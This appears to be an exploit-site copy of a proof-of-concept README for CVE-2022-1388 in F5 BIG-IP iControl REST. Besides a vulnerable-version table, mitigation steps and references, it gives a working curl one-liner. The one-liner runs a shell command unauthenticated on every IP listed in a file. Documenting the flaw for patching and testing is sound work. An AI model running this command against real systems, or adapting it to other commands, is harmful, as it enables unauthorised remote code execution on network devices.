## https://sploitus.com/exploit?id=C807D3D7-EF10-5C00-8252-C9F4B2A7F1F3
# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services
## PoC
You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.
```bash
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
```
## Vulnerable Versions (Big-IP)
| Branch | Vulnerable Versions | Fixes Introduced |
| ---- | ----| ---- |
|11.x|11.6.1-11.6.5|No Fix|
|12.x|12.1.0-12.1.6|No Fix|
|13.x|13.1.0-13.1.4|13.1.5|
|14.x|14.1.0-14.1.4|14.1.4.6|
|15.x|15.1.0-15.1.5|15.1.5.1|
|16.x|16.1.0-16.1.2|16.1.2.2|
|17.x|None|17.0.0|
## Mitigation
<ul>
<li>Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)</li>
<li>Block iControl REST access through the self IP address</li>
<li>Block iControl REST access through the management interface</li>
<li>Modify the BIG-IP httpd configuration</li>
</ul>
For more information about mitigation check out the references.
## References
<ul>
<li>https://vulners.com/cve/CVE-2022-1388</li>
<li>https://support.f5.com/csp/article/K23605346</li>
<li>https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit</li>
</ul>